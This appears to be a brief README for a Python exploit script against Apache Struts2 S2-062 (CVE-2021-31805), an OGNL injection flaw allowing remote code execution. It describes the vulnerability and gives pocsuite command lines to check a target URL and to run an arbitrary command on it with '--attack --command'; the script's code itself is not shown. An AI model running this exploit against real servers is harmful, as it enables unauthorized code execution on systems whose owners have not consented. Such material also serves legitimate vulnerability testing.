CVE-2021-31805
Remote code execution S2-062 (CVE-2021-31805) Due to Apache Struts2's incomplete fix for S2-061 (CVE-2020-17530), some tag attributes can still execute OGNL expressions, The vulnerability allows an attacker to construct malicious data to remotely execute arbitrary code.
CVE_2021_31805_POC_EXP.py
POC
pocsuite -r CVE_2021_31805_POC_EXP.py -u url
EXP
pocsuite -r CVE_2021_31805_POC_EXP.py -u url --attack --command "[command]"